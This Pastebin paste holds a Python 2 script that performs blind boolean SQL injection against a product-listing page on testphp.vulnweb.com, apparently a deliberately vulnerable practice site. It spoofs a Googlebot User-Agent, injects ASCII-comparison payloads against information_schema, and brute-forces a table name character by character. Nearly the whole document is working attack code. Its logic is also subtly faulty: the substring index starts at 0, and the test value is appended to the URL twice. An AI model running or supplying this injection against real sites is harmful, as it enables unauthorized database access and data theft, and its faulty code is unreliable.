Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/python
- import sys
- import urllib2
- def sendRequest(fullURL):
- headers = {}
- headers['User-Agent'] = "Googlebot"
- request = urllib2.Request(fullURL, headers=headers)
- response = urllib2.urlopen(request)
- resp = response.read()
- response.close()
- return resp;
- def generatePayload(index, asciiCode):
- payload = " and ascii(substring((Select table_name from information_schema.tables where table_schema=database() limit 0,1)," + str(index) +",1))=" + str(asciiCode)
- return payload
- def main():
- url = "http://testphp.vulnweb.com/listproducts.php?cat=2"
- asciil = 32
- #by default we suppose that the max table name size is 10
- table_name_max_size = 10
- tablename = ""
- for i in range(table_name_max_size):
- while asciil < 126 :
- fullURL = str(url) + generatePayload(i, asciil)
- print "[+] : Testing with ascii value " + str(asciil)
- response = sendRequest(fullURL + str(asciil))
- if "painted by" in response:
- print "[*] : Letter found " + chr(asciil)
- tablename += chr(asciil)
- asciil = 32
- break
- asciil = asciil + 1
- print "[*] : Table Name is : " + tablename
- main()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement